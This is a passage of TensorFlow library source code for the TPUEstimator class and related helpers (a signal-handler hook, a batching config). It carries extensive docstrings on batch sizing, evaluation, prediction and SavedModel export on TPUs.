self._summary_writer.add_summary(example_summary, global_step)
tf.compat.v1.logging.info('global_step/sec: %g', global_step_per_sec)
tf.compat.v1.logging.info('examples/sec: %g', examples_per_sec)
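# Example usage (a sketch; `train_batch_size`, `train_input_fn` and `est` are
# assumed to be defined by the caller):
#
#   hook = ExamplesPerSecondHook(batch_size=train_batch_size,
#                                every_n_steps=100,
#                                output_dir=est.model_dir)
#   est.train(input_fn=train_input_fn, hooks=[hook])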
class InstallSignalHandlerHook(tf.compat.v1.train.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=100):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
100.
Returns:
A BatchConfig instance.
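Example (a minimal sketch):
  batch_config = BatchConfig(
      num_batch_threads=2,
      max_batch_size=8,
      batch_timeout_micros=5000,
      allowed_batch_sizes=[2, 4, 8])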
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
prediction will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
in BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
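For example, a manual initialization outside TensorFlow Serving could be
sketched as follows; the session target and `export_dir` are placeholders:
```
with tf.compat.v1.Session('grpc://<tpu-worker>:8470') as sess:
  sess.run(tf.compat.v1.tpu.initialize_system())
  tf.compat.v1.saved_model.load(
      sess, [tf.saved_model.SERVING, tf.saved_model.TPU], export_dir)
  # ... run inference through the loaded signatures ...
  sess.run(tf.compat.v1.tpu.shutdown_system())
```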
There are two versions of this API, V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] = (
    export_output_lib.ClassificationOutput(classes=classes))
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets the `params['use_tpu']` flag to let the user
know whether the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()` themselves, as sketched below.
TIP: V2 is recommended as it is more flexible (e.g. for batching).
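Example (V2, a sketch only; `build_network` is an illustrative name):
----------------
```
def model_fn(features, labels, mode, config, params):
  def build_network(features):
    logits = ...  # Construct the model graph.
    return logits
  if params['use_tpu']:
    # In V2 the user wraps the TPU portion of the graph explicitly.
    # `tpu.rewrite` returns a single-value output wrapped in a tuple.
    logits = tf.compat.v1.tpu.rewrite(build_network, [features])[0]
  else:
    logits = build_network(features)
  ...
```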
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic Python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
TPU training and evaluation respect this bit, but eval_on_tpu can
override the execution of eval. See `eval_on_tpu` below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported. Currently,
export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance to support
using TPU embedding.
export_saved_model_api_version: an integer (1 or 2) or an
`ExportSavedModelApiVersion` enum; 1 corresponds to V1 and 2 corresponds
to V2. Defaults to V1. With V1, `export_saved_model()` adds rewrite() and
TPUPartitionedCallOp() for the user; with V2, the user is expected to add
rewrite(), TPUPartitionedCallOp(), etc. in their model_fn.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in (
tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 are supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
_tpu_estimator_gauge.get_cell().set(True)
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(
math.ceil(
float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(self._config, train_batch_size,
eval_batch_size,
predict_batch_size, use_tpu,
eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not (isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion)
or export_saved_model_api_version == 1
or export_saved_model_api_version == 2):
raise ValueError('export_saved_model_api_version should be 1 or 2; '
'got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
tf.compat.v1.logging.warn(
'TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tf.saved_model.SERVING, tf.saved_model.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if (
(self._export_saved_model_api_version ==
ExportSavedModelApiVersion.V1)
or self._export_saved_model_api_version == 1):
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator,
self)._call_model_fn(features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator,
self)._convert_train_steps_to_hooks(steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode, input_context=None):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
input_context: Optional instance of `tf.distribute.InputContext`.
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
if 'input_context' in input_fn_args:
kwargs['input_context'] = input_context
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps the user have the
# same input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with tf.compat.v1.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates a confusing warning
message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
tf.compat.v1.logging.info('Running %s on CPU/GPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = tf.compat.v1.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
has_saver_hook = training_hooks and any(
isinstance(hook, tf.compat.v1.train.CheckpointSaverHook)
for hook in training_hooks)
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters))
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' %
shutdown_mode)
if finalizer_hooks:
if has_saver_hook:
saver = _NotSaver(
'No save on shutdown when there are user-defined '
'CheckpointSaverHooks')
else:
saver = None # Yes automatic save on shutdown.
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks,
saver=saver))
with tf.control_dependencies([loss]):
global_step = tf.identity(tf.compat.v1.train.get_global_step())
hooks = input_hooks + shutdown_hooks
if ctx.feed_hook is not None:
tf.compat.v1.logging.info(
'Using user-implemented TPU infeed/outfeed session hook class.')
infeed_outfeed_session_hook_class = ctx.feed_hook
else:
infeed_outfeed_session_hook_class = TPUInfeedOutfeedSessionHook
hooks.extend([
infeed_outfeed_session_hook_class(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(
tf.compat.v1.train.LoggingTensorHook(
{
'loss': tf.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (not has_saver_hook and
(self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps)):
checkpoint_hook = tf.compat.v1.train.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold,
save_graph_def=self._config.checkpoint_save_graph_def)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
else:
tf.compat.v1.logging.info('Bypassing TPUEstimator hook')
